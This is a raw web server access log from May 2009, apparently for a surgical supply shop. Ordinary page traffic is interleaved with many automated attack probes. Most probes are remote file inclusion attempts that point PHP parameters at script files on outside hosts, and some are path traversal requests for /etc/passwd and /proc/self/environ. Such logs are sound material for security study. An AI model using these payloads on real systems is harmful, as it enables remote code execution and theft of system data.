91.121.210.42 - - [19/May/2009:00:42:18 -0400] "GET /logs/access_log.Q108061000//admin/spaw/spaw_control.class.php?spaw_root=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.64.202.135 - - [19/May/2009:00:42:26 -0400] "GET /logs/access_log.Q108051700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
208.64.202.135 - - [19/May/2009:00:42:29 -0400] "GET /logs/access_log.Q108051700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.151.233.72 - - [19/May/2009:00:42:40 -0400] "GET /logs/.scan../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:00:42:40 -0400] "GET /logs/access_log.Q108090300/.scan../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:00:42:40 -0400] "GET /.scan../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:00:42:41 -0400] "GET /logs/access_log.Q109030800/.scan../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
69.59.148.76 - - [19/May/2009:00:43:01 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:00:43:01 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:00:43:01 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:00:43:01 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:00:43:02 -0400] "GET /logs/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:00:43:02 -0400] "GET /logs/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:00:43:02 -0400] "GET /logs/access_log.Q108090500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:00:43:02 -0400] "GET /logs/access_log.Q108090500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
209.59.12.99 - - [19/May/2009:00:44:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.45.176.186 - - [19/May/2009:00:44:49 -0400] "GET /logs/access_log.Q108091400/index.php?path[docroot]=http://keramput.net/whmcs/id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.45.176.186 - - [19/May/2009:00:45:04 -0400] "GET /logs/access_log.Q108073000/index.php?path[docroot]=http://keramput.net/whmcs/id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:00:45:42 -0400] "GET /logs/access_log.Q108062800//phpsecurityadmin/include/logout.php?PSA_PATH=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
62.44.79.35 - - [19/May/2009:00:45:42 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
62.44.79.35 - - [19/May/2009:00:45:42 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
62.44.79.35 - - [19/May/2009:00:45:43 -0400] "GET /logs/access_log.Q108060200//phpsecurityadmin/include/logout.php?PSA_PATH=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
77.221.130.2 - - [19/May/2009:00:45:43 -0400] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 245 "-" "Advanced Browser (http://www.avantbrowser.com)"
77.221.130.2 - - [19/May/2009:00:45:44 -0400] "GET /errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [19/May/2009:00:45:44 -0400] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
77.221.130.2 - - [19/May/2009:00:45:44 -0400] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
77.221.130.2 - - [19/May/2009:00:45:45 -0400] "GET /logs/access_log.Q108052400/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 272 "-" "Advanced Browser (http://www.avantbrowser.com)"
77.221.130.2 - - [19/May/2009:00:45:45 -0400] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 250 "-" "Advanced Browser (http://www.avantbrowser.com)"
77.221.130.2 - - [19/May/2009:00:45:45 -0400] "GET /logs/access_log.Q108052400/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [19/May/2009:00:45:45 -0400] "GET /logs/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [19/May/2009:00:45:46 -0400] "GET /logs/access_log.Q108052400/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 272 "-" "XXXXXX"
77.221.130.2 - - [19/May/2009:00:45:46 -0400] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
77.221.130.2 - - [19/May/2009:00:45:46 -0400] "GET /logs/access_log.Q108052400/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 272 "-" "XXXXXX"
77.221.130.2 - - [19/May/2009:00:45:46 -0400] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
71.182.177.213 - - [19/May/2009:00:46:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:25 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:35 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol HTTP/1.1" 200 38019 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:36 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:38 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:38 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:38 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:38 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:38 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:38 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:38 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:38 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:39 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:39 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.182.177.213 - - [19/May/2009:00:46:39 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):debacterol" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
77.221.130.2 - - [19/May/2009:00:47:13 -0400] "GET /logs/access_log.Q108090100/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 272 "-" "Advanced Browser (http://www.avantbrowser.com)"
77.221.130.2 - - [19/May/2009:00:47:14 -0400] "GET /logs/access_log.Q108090100/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [19/May/2009:00:47:14 -0400] "GET /logs/access_log.Q108090100/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 272 "-" "XXXXXX"
77.221.130.2 - - [19/May/2009:00:47:14 -0400] "GET /logs/access_log.Q108090100/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 272 "-" "XXXXXX"
65.98.59.178 - - [19/May/2009:00:48:46 -0400] "GET //administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:48:46 -0400] "GET /logs/access_log.Q109022600//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:48:46 -0400] "GET /logs/error_log.Q109050400//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:48:46 -0400] "GET /logs//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.231.24.38 - - [19/May/2009:00:48:51 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:48:51 -0400] "GET ///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:48:53 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:48:53 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:48:54 -0400] "GET ///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:48:54 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:48:54 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:48:54 -0400] "GET ///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:48:55 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
69.59.148.76 - - [19/May/2009:00:49:28 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:00:49:32 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.69"
209.59.12.99 - - [19/May/2009:00:49:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [19/May/2009:00:49:43 -0400] "GET /logs/access_log.Q109022600%20%20//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:49:43 -0400] "GET /logs/error_log.Q109050400%20%20//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:49:53 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:50:06 -0400] "GET //administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:50:06 -0400] "GET /logs//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:50:06 -0400] "GET /logs/access_log.Q109022600//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:50:06 -0400] "GET /logs/error_log.Q109050400//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:51:27 -0400] "GET /logs/access_log.Q109051100//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:00:52:00 -0400] "GET //administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:00:52:00 -0400] "GET /logs//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
